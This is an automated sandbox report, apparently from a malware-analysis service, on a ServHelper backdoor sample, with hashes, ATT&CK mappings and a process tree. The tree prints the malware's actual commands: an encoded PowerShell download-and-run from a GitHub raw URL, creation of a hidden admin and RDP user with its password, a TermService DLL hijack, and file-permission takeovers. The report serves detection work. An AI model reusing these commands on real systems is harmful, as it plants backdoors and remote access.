servhelper | 52bb9b4983378e9f6320427b1f0e6f142de7ecbe3aae04b9f920274a706ae55d

Analysis

max time kernel
132s
max time network
126s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
01-04-2024 23:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7d12718184f35c6818bc111a1f5c69c5_JaffaCakes118.exe
Size

5.7MB
MD5

7d12718184f35c6818bc111a1f5c69c5
SHA1

637806858f9c7f2fd2f2e4289e1b5afbe2c00b58
SHA256

52bb9b4983378e9f6320427b1f0e6f142de7ecbe3aae04b9f920274a706ae55d
SHA512

fafdb853d95478d56704e94fef6c3c95a409ba9573e6428684a49b0855f3dfb4717e7e28fd30d1943ffcdf11605046d735e2f042348318a54552c110171a03c9
SSDEEP

49152:vTbWVRE2rb/T/vO90dL3BmAFd4A64nsfJ1g8Dl5oVIqmen/tjgO6YdFN9I9Ws/Hd:vTiMvDEmAQQQQQQQQQQQQQj

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
5	2788	powershell.exe
6	2788	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid	Process
1992	icacls.exe
2852	icacls.exe
2288	icacls.exe
2000	icacls.exe
2056	takeown.exe
2088	icacls.exe
2308	icacls.exe
1680	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid	Process
1000
1000

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
2288	icacls.exe
2000	icacls.exe
2056	takeown.exe
2088	icacls.exe
2308	icacls.exe
1680	icacls.exe
1992	icacls.exe
2852	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x0033000000015c3d-104.dat	upx
behavioral1/files/0x000b000000015c76-105.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D5BNLDQCHVXJZ2KBR5JG.temp	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exe

pid	Process
1724	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exeWMIC.exepowershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e03ad50f8b84da01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
3012	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2696	powershell.exe
2248	powershell.exe
1912	powershell.exe
1140	powershell.exe
2696	powershell.exe
2696	powershell.exe
2696	powershell.exe
2788	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid	Process
468
1000
1000
1000
1000

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	2248	powershell.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	1140	powershell.exe
Token: SeRestorePrivilege	2308	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	1724	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1724	WMIC.exe
Token: SeAuditPrivilege	1724	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1724	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1724	WMIC.exe
Token: SeAuditPrivilege	1724	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2256	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2256	WMIC.exe
Token: SeAuditPrivilege	2256	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2256	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2256	WMIC.exe
Token: SeAuditPrivilege	2256	WMIC.exe
Token: SeDebugPrivilege	2788	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7d12718184f35c6818bc111a1f5c69c5_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	Process	procid_target
PID 2404 wrote to memory of 2696	2404	7d12718184f35c6818bc111a1f5c69c5_JaffaCakes118.exe	29
PID 2404 wrote to memory of 2696	2404	7d12718184f35c6818bc111a1f5c69c5_JaffaCakes118.exe	29
PID 2404 wrote to memory of 2696	2404	7d12718184f35c6818bc111a1f5c69c5_JaffaCakes118.exe	29
PID 2696 wrote to memory of 2656	2696	powershell.exe	31
PID 2696 wrote to memory of 2656	2696	powershell.exe	31
PID 2696 wrote to memory of 2656	2696	powershell.exe	31
PID 2656 wrote to memory of 2500	2656	csc.exe	32
PID 2656 wrote to memory of 2500	2656	csc.exe	32
PID 2656 wrote to memory of 2500	2656	csc.exe	32
PID 2696 wrote to memory of 2248	2696	powershell.exe	33
PID 2696 wrote to memory of 2248	2696	powershell.exe	33
PID 2696 wrote to memory of 2248	2696	powershell.exe	33
PID 2696 wrote to memory of 1912	2696	powershell.exe	35
PID 2696 wrote to memory of 1912	2696	powershell.exe	35
PID 2696 wrote to memory of 1912	2696	powershell.exe	35
PID 2696 wrote to memory of 1140	2696	powershell.exe	37
PID 2696 wrote to memory of 1140	2696	powershell.exe	37
PID 2696 wrote to memory of 1140	2696	powershell.exe	37
PID 2696 wrote to memory of 2056	2696	powershell.exe	39
PID 2696 wrote to memory of 2056	2696	powershell.exe	39
PID 2696 wrote to memory of 2056	2696	powershell.exe	39
PID 2696 wrote to memory of 2088	2696	powershell.exe	40
PID 2696 wrote to memory of 2088	2696	powershell.exe	40
PID 2696 wrote to memory of 2088	2696	powershell.exe	40
PID 2696 wrote to memory of 2308	2696	powershell.exe	41
PID 2696 wrote to memory of 2308	2696	powershell.exe	41
PID 2696 wrote to memory of 2308	2696	powershell.exe	41
PID 2696 wrote to memory of 1680	2696	powershell.exe	42
PID 2696 wrote to memory of 1680	2696	powershell.exe	42
PID 2696 wrote to memory of 1680	2696	powershell.exe	42
PID 2696 wrote to memory of 1992	2696	powershell.exe	43
PID 2696 wrote to memory of 1992	2696	powershell.exe	43
PID 2696 wrote to memory of 1992	2696	powershell.exe	43
PID 2696 wrote to memory of 2852	2696	powershell.exe	44
PID 2696 wrote to memory of 2852	2696	powershell.exe	44
PID 2696 wrote to memory of 2852	2696	powershell.exe	44
PID 2696 wrote to memory of 2288	2696	powershell.exe	45
PID 2696 wrote to memory of 2288	2696	powershell.exe	45
PID 2696 wrote to memory of 2288	2696	powershell.exe	45
PID 2696 wrote to memory of 2000	2696	powershell.exe	46
PID 2696 wrote to memory of 2000	2696	powershell.exe	46
PID 2696 wrote to memory of 2000	2696	powershell.exe	46
PID 2696 wrote to memory of 3020	2696	powershell.exe	47
PID 2696 wrote to memory of 3020	2696	powershell.exe	47
PID 2696 wrote to memory of 3020	2696	powershell.exe	47
PID 2696 wrote to memory of 3012	2696	powershell.exe	48
PID 2696 wrote to memory of 3012	2696	powershell.exe	48
PID 2696 wrote to memory of 3012	2696	powershell.exe	48
PID 2696 wrote to memory of 2244	2696	powershell.exe	49
PID 2696 wrote to memory of 2244	2696	powershell.exe	49
PID 2696 wrote to memory of 2244	2696	powershell.exe	49
PID 2696 wrote to memory of 364	2696	powershell.exe	52
PID 2696 wrote to memory of 364	2696	powershell.exe	52
PID 2696 wrote to memory of 364	2696	powershell.exe	52
PID 364 wrote to memory of 340	364	net.exe	53
PID 364 wrote to memory of 340	364	net.exe	53
PID 364 wrote to memory of 340	364	net.exe	53
PID 2696 wrote to memory of 920	2696	powershell.exe	54
PID 2696 wrote to memory of 920	2696	powershell.exe	54
PID 2696 wrote to memory of 920	2696	powershell.exe	54
PID 920 wrote to memory of 1828	920	cmd.exe	55
PID 920 wrote to memory of 1828	920	cmd.exe	55
PID 920 wrote to memory of 1828	920	cmd.exe	55
PID 1828 wrote to memory of 1044	1828	cmd.exe	56

C:\Users\Admin\AppData\Local\Temp\7d12718184f35c6818bc111a1f5c69c5_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\7d12718184f35c6818bc111a1f5c69c5_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2696
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\8jgn1mvc.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2656
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6874.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6873.tmp"
      4⤵
      PID:2500
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2248
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1140
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2056
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2088
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2308
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1680
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1992
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2852
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2288
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2000
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3020
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:3012
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2244
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:364
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:340
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:920
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1828
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:1044
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:2212
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:784
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:756
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:752
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:292
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1628
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:1408

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:2720
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  PID:488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:2516

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 7yoRwlWD /add
1⤵
PID:1936
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 7yoRwlWD /add
  2⤵
  PID:2844
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 7yoRwlWD /add
    3⤵
    PID:2296

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:2100
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:1756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:868

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" IKJSPGIM$ /ADD
1⤵
PID:2224
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" IKJSPGIM$ /ADD
  2⤵
  PID:1600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" IKJSPGIM$ /ADD
    3⤵
    PID:2624

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:1576
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:2636
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2540

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 7yoRwlWD
1⤵
PID:1640
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 7yoRwlWD
  2⤵
  PID:2108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 7yoRwlWD
    3⤵
    PID:2568

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2460
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1724

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2432
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2256

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2480
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8jgn1mvc.dll

Filesize
3KB

MD5
8a267dc8725f2478078580946fa362e3

SHA1
8259124dc3b4b1beb247de5a8cbe4a93d33f22f6

SHA256
415dc794645d01547a30d2f9c7bd737174846f3bac3d8ba81763c7b953eb6f12

SHA512
1dcfbdc704b7d0ebf3553f5bf80319461d1bf8566f4f8122df8daddcf2512236056bc8b3a11966172b81e35760ae3c7d77ca3c1c72ad4f30a8b3b5ba89d624bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\8jgn1mvc.pdb

Filesize
7KB

MD5
95c1f437ea50823743e53ad58109654b

SHA1
88839b8c190e9e3d4d8b38c16e930209ff3b767b

SHA256
a1f5c46bac3fb69725bc209eeefecca12d078669f087c5e9edeff94510d3e15f

SHA512
9a12a31ca927ac8297b23b09a699219efc2b99683f3dcc0f8e79a8be86b5d940e6454c4abb2ac3a8f75dcd9f11a8dfec964877604f7bb71bae8b861c62c39441

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6874.tmp

Filesize
1KB

MD5
cb1589d05f8c224c6231b3d2aa8c205f

SHA1
8a058e66a023a3650401c53012fa20b7513f9626

SHA256
904f76d74ead3ed0613ca106f15b003e25bd12be180a9408c7cb920a15f638cc

SHA512
989a26b8f879836fc17bf084ea9b3e6bc51656307c4c1a3904b8b33599f991a0c46308c1bab6fb049079c9611d3d1084c2f3871c017e6ef4cbe57cd5c7fbb10f

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

Filesize
2.5MB

MD5
09943fef6e44c022be35da249d514723

SHA1
bbb0cb31ab3cc5cdf80cea91dc15a6fdf127a0f9

SHA256
d3fb75a7ea8a822d7ce99ae06caaf1182860ddc321142494e45d7a071193e953

SHA512
1b4ee7254f56f39b605f10c2573054f4b7256ebd512a5943acb41c23558380443cd594d11e3ba7583a7f45d401d1b684f8c94febe3567ab903724f04e01dff9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6f2b3438a84ca1db2ad63911c92136a5

SHA1
797f291935f64ac62ba2cd0470ba60ab3d4fbade

SHA256
471e5caed441712e9401923f23a3f63a190cd4218549d7a5ab2b0ffee959e5d6

SHA512
c78fbd0905643d241b0bbcdaf07c18304b22eef8f252d3cc6da780c278530b70da6ac2f77df0272dfd9a8d526a97999abffd604cbd3d179be28656d44ec28de7

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\samr

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\8jgn1mvc.0.cs

Filesize
424B

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\8jgn1mvc.cmdline

Filesize
309B

MD5
814b67707f91262df612314ff6ba0aa1

SHA1
49dfe7f8adccda9f9b2c89a30cd15cd3cf8952e0

SHA256
cef38f749392219fb1ea6e90085a7b0e953ae7fd0b024236d7471acc162ad4f2

SHA512
0fe64803fb6141d273834985e9eb1ab6c2b5c4342e44cf5ddc52ba921b08085be94684579d376a1b9b6e8c601d156db775c0eb5b5c56b5a03b2906a3090e4d1e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC6873.tmp

Filesize
652B

MD5
efdd60dcf0981b9f206bae1dc0739372

SHA1
b8b23857c35a5f2bc16f3d21c1172b12caf3bcda

SHA256
2263e511119a6780ab8c7ce31370c1e622b0d1400de808d19a4f7d041d7c3237

SHA512
5077d94b41778c26ac6d578b5c199191dfd83b14a327dfc82bcf65425c4b3d7ad0ff352d4cb5eb5c3519e7d843e5908fa0797b5e42972b8d374d05a34d70c060

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
b98428c062b0eab6e519248af60ba869

SHA1
429e8a43e6bdcec95e381e63ebacf32b461ffa0c

SHA256
119ca0528bef4b1ee7e16683ed3a0705648fea93379903f254ef4ef735db8193

SHA512
43098defabf2ea8d052de9a69a2a1f92ec4b4cf73c89447c8f5dac85190d7489498cc6f8b32865fb322ae1f2ab05c3f8e51905fd97b446e9e81bfbf1b089c43a

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
d9cbd823509feefe440aa85a009a5a7c

SHA1
430faab3ded95b6b494acee0739937acac80d8ce

SHA256
b94301a42868f776f5b05abdbd76fc5f13e9cf4576eb48328adddb08e8b2872a

SHA512
40ef5d5e6a4969478ca295a39659b16d618b7fd049d29780b9d05393e266a60d0725641004d896118c1af20b7f2a58ee3bb696c6b672a536acb071b4a09228ae

Download Submit
memory/1140-80-0x000000000283C000-0x00000000028A3000-memory.dmp

Filesize
412KB

Download
memory/1140-74-0x000007FEED1E0000-0x000007FEEDB7D000-memory.dmp

Filesize
9.6MB

Download
memory/1140-83-0x000007FEED1E0000-0x000007FEEDB7D000-memory.dmp

Filesize
9.6MB

Download
memory/1140-79-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/1140-78-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/1140-77-0x000007FEED1E0000-0x000007FEEDB7D000-memory.dmp

Filesize
9.6MB

Download
memory/1140-76-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/1912-60-0x000007FEED1E0000-0x000007FEEDB7D000-memory.dmp

Filesize
9.6MB

Download
memory/1912-68-0x000007FEED1E0000-0x000007FEEDB7D000-memory.dmp

Filesize
9.6MB

Download
memory/1912-65-0x00000000028B0000-0x0000000002930000-memory.dmp

Filesize
512KB

Download
